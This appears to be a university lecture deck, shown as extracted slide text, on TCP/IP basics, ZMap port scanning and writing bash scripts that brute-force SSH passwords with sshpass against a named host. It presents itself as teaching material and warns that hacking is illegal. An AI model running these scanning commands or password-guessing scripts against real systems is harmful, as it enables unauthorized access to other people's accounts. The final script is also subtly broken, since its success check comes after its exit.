Network Security In Linux: Scanning and Hacking

Similar documents
EXPLORER. TFT Filter CONFIGURATION

Make a folder named Lab3. We will be using Unix redirection commands to create several output files in that folder.

Lab Objectives & Turn In

Solution of Exercise Sheet 5

Overview of Network Security The need for network security Desirable security properties Common vulnerabilities Security policy designs

File Transfer Examples. Running commands on other computers and transferring files between computers

LESSON Networking Fundamentals. Understand TCP/IP

How To Set Up A Network Map In Linux On A Ubuntu 2.5 (Amd64) On A Raspberry Mobi) On An Ubuntu (Amd66) On Ubuntu 4.5 On A Windows Box

File Transfer Protocol (FTP) Chuan-Ming Liu Computer Science and Information Engineering National Taipei University of Technology Fall 2007, TAIWAN

finger, ftp, host, hostname, mesg, rcp, rlogin, rsh, scp, sftp, slogin, ssh, talk, telnet, users, w, walla, who, write,...

IDS and Penetration Testing Lab ISA 674

School of Information Science (IS 2935 Introduction to Computer Security, 2003)

NETWORK SECURITY WITH OPENSOURCE FIREWALL

CTS2134 Introduction to Networking. Module Network Security

ZMap. Fast Internet-Wide Scanning and its Security Applications. Zakir Durumeric Eric Wustrow J. Alex Halderman. University of Michigan

RemotelyAnywhere. Security Considerations

Port Scanning. Objectives. Introduction: Port Scanning. 1. Introduce the techniques of port scanning. 2. Use port scanning audit tools such as Nmap.

EE984 Laboratory Experiment 2: Protocol Analysis

Penetration Testing Report Client: Business Solutions June 15 th 2015

Chapter 4 Managing Your Network

Remote login (Telnet):

Linux Network Security

Security Type of attacks Firewalls Protocols Packet filter

Project 2: Firewall Design (Phase I)

How to protect your home/office network?

Linux Shell Script To Monitor Ftp Server Connection

Author: Sumedt Jitpukdebodin. Organization: ACIS i-secure. ID: My Blog:

Firewalls (IPTABLES)

Networks and Security Lab. Network Forensics

STABLE & SECURE BANK lab writeup. Page 1 of 21

Abstract. Introduction. Section I. What is Denial of Service Attack?

This Lecture. The Internet and Sockets. The Start If everyone just sends a small packet of data, they can all use the line at the same.

Track 2 Workshop PacNOG 7 American Samoa. Firewalling and NAT

Firewalls. Firewalls. Idea: separate local network from the Internet 2/24/15. Intranet DMZ. Trusted hosts and networks. Firewall.

Basic Network Configuration

Connecting with Computer Science, 2e. Chapter 5 The Internet

Connecting to and Setting Up a Network

REPORT ON AUDIT OF LOCAL AREA NETWORK OF C-STAR LAB

Overview. Packet filter

Cryptography and network security

Remote Logging. Tanveer Brohi(14cs28)

Security Considerations White Paper for Cisco Smart Storage 1

Firewalls and Software Updates

Cybernetic Proving Ground

Evaluation guide. Vyatta Quick Evaluation Guide

- Basic Router Security -

Penetration Testing Workshop

Lab 2: Secure Network Administration Principles - Log Analysis

Case Study 2 SPR500 Fall 2009

IMPLEMENTATION OF INTELLIGENT FIREWALL TO CHECK INTERNET HACKERS THREAT

Chapter 6 Using Network Monitoring Tools

Large-Scale TCP Packet Flow Analysis for Common Protocols Using Apache Hadoop

Introduction to Network Security Lab 1 - Wireshark

Netcat Commands. I am going to give you insight and knowledge so that you can understand netcat Me0wwww. WOW, something useful and FREE

Looking for Trouble: ICMP and IP Statistics to Watch

How To Set Up An Ip Firewall On Linux With Iptables (For Ubuntu) And Iptable (For Windows)

8 steps to protect your Cisco router

Firewalls. Pehr Söderman KTH-CSC

1. LAB SNIFFING LAB ID: 10

Sniffing in a Switched Network

Windows Client/Server Local Area Network (LAN) System Security Lab 2 Time allocation 3 hours

Scanning Tools. Scan Types. Network sweeping - Basic technique used to determine which of a range of IP addresses map to live hosts.

1 Data information is sent onto the network cable using which of the following? A Communication protocol B Data packet

HONEYD (OPEN SOURCE HONEYPOT SOFTWARE)

How to hack a website with Metasploit

CSE331: Introduction to Networks and Security. Lecture 32 Fall 2004

Background (

How To Protect Your Network From A Hacker Attack On Zcoo Ip Phx From A Pbx From An Ip Phone From A Cell Phone From An Uniden Ip Pho From A Sim Sims (For A Sims) From A

Firewall Design Principles Firewall Characteristics Types of Firewalls

Smartphone Pentest Framework v0.1. User Guide

Networking Security IP packet security

The Barracuda Network Connector. System Requirements. Barracuda SSL VPN

File Transfer And Access (FTP, TFTP, NFS) Chapter 25 By: Sang Oh Spencer Kam Atsuya Takagi

IP Filter/Firewall Setup

Chapter 6 Using Network Monitoring Tools

Reverse Shells Enable Attackers To Operate From Your Network. Richard Hammer August 2006

Transport Layer Protocols

Firewall VPN Router. Quick Installation Guide M73-APO09-380

First Workshop on Open Source and Internet Technology for Scientific Environment: with case studies from Environmental Monitoring

IP Filter/Firewall Setup

Multi-Homing Dual WAN Firewall Router

Introduction To Computer Networking

Setting Up Scan to SMB on TaskALFA series MFP s.

1 hours, 30 minutes, 38 seconds Heavy scan. All scanned network resources. Copyright 2001, FTP access obtained

Sage ERP Accpac Online

My FreeScan Vulnerabilities Report

CIT 380: Securing Computer Systems

Sage 300 ERP Online. Mac Resource Guide. (Formerly Sage ERP Accpac Online) Updated June 1, Page 1

CCM 4350 Week 11. Security Architecture and Engineering. Guest Lecturer: Mr Louis Slabbert School of Science and Technology.

Server Security. Contents. Is Rumpus Secure? 2. Use Care When Creating User Accounts 2. Managing Passwords 3. Watch Out For Aliases 4

Network Penetration Testing and Ethical Hacking Scanning/Penetration Testing. SANS Security Sans Mentor: Daryl Fallin

Network Monitoring Tool to Identify Malware Infected Computers

CS 665: Computer System Security. Network Security. Usage environment. Sources of vulnerabilities. Information Assurance Module

Five Steps to Improve Internal Network Security. Chattanooga ISSA

Network Security. Tampere Seminar 23rd October Overview Switch Security Firewalls Conclusion

Network Monitoring Tool with LAMP Architecture

Firewalls. Chapter 3

Fundamentals of UNIX Lab Networking Commands (Estimated time: 45 min.)

Data Collection and Analysis: Get End-to-End Security with Cisco Connected Analytics for Network Deployment

An Introduction to Network Vulnerability Testing

Transcription:

Network Security In Linux: Scanning and Hacking

Review Lex A lexical analyzer that tokenizes an input text. Yacc A parser that parses and acts based on defined grammar rules involving tokens. How to compile Lex and Yacc source files into an executable file.

Outline A naïve way to hack Background IP network TCP protocols Network scanning A script for infinite SSH login attempt.

Background Internet: A set of inter-connected networks Largely rely on the TCP/IP protocol IP : Internet Protocol Provide an address for information routing Data is segmented into packets. TCP : Transmission Control Protocol Over IP, control how to transmit IP packets, Port numbers: differentiate services.

IP Responsible for end to end transmission Sends data in individual packets Maximum size of packet is determined by the networks Fragmented if too large Unreliable Packets might be lost, corrupted, duplicated, delivered out of order

IP address IP address: 4 bytes e.g. 141.225.9.148 (csa.memphis.edu) Each device normally gets one In theory there are about 4 billion available A subnet: 4 bytes IP / [0~32] Represent a range of IP addresses e.g., 141.225.8.1/22 a subnet at UofM, including computers in Dunn Hall.

TCP port number A port number is an application-specific software construct serving as a communications endpoint in a computer's host operating system. 2 Bytes: 0 ~ 65535 Used to differentiate services. Examples: 21 FTP, 22 SSH, 23 Telnet, 80 HTTP, 443 HTTPS

How to connect to a machine You got an IP address, you know what you want Surfing web send packets with the destination IP and port number 80 SSH login send packets with the destination IP and port number 22 Then, wait for the data sent back.

Potential Risks As long as your machine has an IP and connect to the Internet, everyone can try to log in to your machine. FTP login SSH login Telnet login PHP login MySQL login Our focus here

How to SSH log in to a machine Steps: You need to know a machine has SSH service. You need a username and a password, Then, connect to the destination IP on port 22. Example: ssh comp4272@csa.memphis.edu The computer will create a packet consisting of The IP of csa.memphis.edu: 141.225.9.148 The port number of SSH: 22 The username: comp4272

Check if a machine supports SSH Port scanning Scan a subnet or the whole Internet to see which machines support SSH login. Implementation: Send a login packet to an IP with port 22, test if there is a response.

Scanning Tool in Linux ZMap A very recent tool. https://zmap.io/ Released in 2013. Installation: Download the source, compile and install. https://github.com/zmap/zmap Ubuntu/Mint: apt-get install zmap

ZMap Feature Fast can port scan the entire IPv4 address space from just one machine in under 1 hour.

Speed of ZMap vs Nmap Averages for scanning 1 million random hosts From ZMap authors slides

Internet wide results by ZMap (I) Find vulnerabilities upnp vulnerability disclosed by HD Moore, Jan 29 2013. Scan results in Feb: 15.7 million publicly accessible UPnP devices 3.4 million still vulnerable. ( ~22% )

Internet wide results by ZMap (2) Find service availability Outages during Hurricane Sandy, Oct-Nov 2012 More than 30% decrease From ZMap authors slides

Is port scan legal? DoS attacks Definitely break the law Hacking into someone s computer Definitely break the law Port scan Gray area? most likely prohibited by ISP. Detection systems can prevent port scan.

Response results to ZMap scan 200 Internet-wide scans Got response to exclude 3,753,899 addresses (~0.11% of the IP address space) From ZMap authors slides

ZMap for our use zmap p [port] [IP]/[mask] i [device] o [file] -p: specify a port number -i: can be omitted if you have just one network device -o: output all found IPs into a file Example: zmap p 22 141.225.8.1/22 i eth1 zmap p 22 141.225.9.1/24 i eth1

Exercise: do a port scan Scan subnet 141.225.8.1/22 with port 80. port 22.

Mission Suppose Tom has an account At a remote host: csa.memphis.edu Username: tom Passwords: don t know, but all numbers. Task: write a shell script to get the password

How to guess a password Create a dictionary try all passwords in the dictionary one by one How to create a dictionary: Non-trivial Social engineering What s the user s name? What s the user s birthday? What s the user s nickname?.

Guidelines to create a dictionary Some common things about our passwords People tend to write letters first, then numbers People tend to write special characters last.!, *, @, #, $, % People tend to use birthday, phone numbers, street numbers, zip code, Some people tend to use only numbers. Many people don t like uppercase, or put uppercase first.

A password with only numbers DON T use password that contains only numbers! Create a dictionary that contains all combinations of numbers. Try them one by one. #dict.txt 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22

Try password We can manually try passwords in the dictionary one by one. Or, we can write a shell script to try all passwords. #dict.txt 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 csa.memphis.edu tom ssh port 22

sshpass Command ssh does not support automatic password entering: ssh tom@csa.memphis.edu You always need to enter the password manually. sshpass: support enter password in command line. Ubuntu/Mint install: apt-get install sshpass Usage: sshpass p [password] [orginal ssh command]

sshpass example sshpass -p "12812" ssh tom@csa.memphis.edu If success, it will log in. Otherwise, it will say Permission denied, please try again. Try more: sshpass -p "11111" ssh admin@csa.memphis.edu sshpass -p comp4272" ssh comp4272@csa.memphis.edu

Write a shell script trypassword The arguments of the script are First: IP Second: username Third: password Example:./trypassword csa.memphis.edu tom 1 The script tells you if the login is successful.

trypassword script #!/bin/bash # $1 - ip address to hack # $2 - username # $3 - password Any issue? sshpass -p "$3" ssh $2@$1 &> /dev/null if [ $? -eq 0 ]; then echo "Find the password: $3" exit 0 fi exit 1 /dev/null is a device file that discard all data written to it http://en.wikipedia.org/wiki/null_device

The correct script #!/bin/bash # $1 - ip address to hack # $2 - username # $3 - password echo exit sshpass -p "$3" ssh $2@$1 &> /dev/null if [ $? -eq 0 ]; then echo "Find the password: $3" exit 0 fi exit 1

Put trypassword in a loop trypassword offers one try. Our objective Try every password in the dictionary Put trypassword in a loop. Each time, we try one different password Until we find the correct password. Create a script runhacking

runhacking script #!/bin/bash ip=csa.memphis.edu username=tom dict=dict.txt for password in `cat $dict`; do echo "Try password: $password"./trypassword $ip $username $password if [ $? -eq 0 ]; then exit 0 fi done exit 1 Any issue? Are we done?

Speed up the process #!/bin/bash ip=csa.memphis.edu username=tom dict=dict.txt for password in `cat $dict`; do echo "Try password: $password"./trypassword $ip $username $password if [ $? -eq 0 ]; then exit 0 fi done exit 1 It will hang there and wait for the result!

Our current strategy server time... hacker time

A better strategy server time... hacker time

The new runhacking script #!/bin/bash ip=csa.memphis.edu username=tom dict=dict.txt for password in `cat $dict`; do echo "Try password: $password"./trypassword $ip $username $password & if [ $? -eq 0 ]; then exit 0 done exit 1 fi $? is always 0, how to handle this? & is to make the command run in background (a process will be created to run the command)

How to track status./trypassword./trypassword runhacking./trypassword How can we know a particular process finds the password in the runhacking script? multiple ways../trypassword

If find password, create a file #!/bin/bash # trypassword script: # $1 - ip address to hack # $2 - username # $3 - password # $4 - the filename to save the found password echo "exit" sshpass -p "$3" ssh $2@$1 &> /dev/null if [ $? -eq 0 ]; then echo "Find the password: $3" echo $3 > $4 exit 0 fi exit 1

The final runhacking script #!/bin/bash ip=csa.memphis.edu username=tom dict=dict.txt pwfile=password rm -f $pwfile for password in `cat $dict`; do echo "Try password: $password"./trypassword $ip $username $password $pwfile & done exit 1 # If the password file is created, we find it and exit if [ -f $pwfile ]; then exit 0 fi

Discussions Hacking is ILLEGAL! Running this script to connect to other s computer is illegal! The other s computer can have your IP record, then trace you back. You can try the script on csa.memphis.edu How to prevent this very naïve hacking?

Summary TCP/IP networks IP address and TCP port ZMap Very fast Internet scanner A naïve script to try passwords Hacking is ILLEGAL! How to defend?

2024 © DocPlayer.net Privacy Policy | Terms of Service | Feedback  | Do Not Sell My Personal Information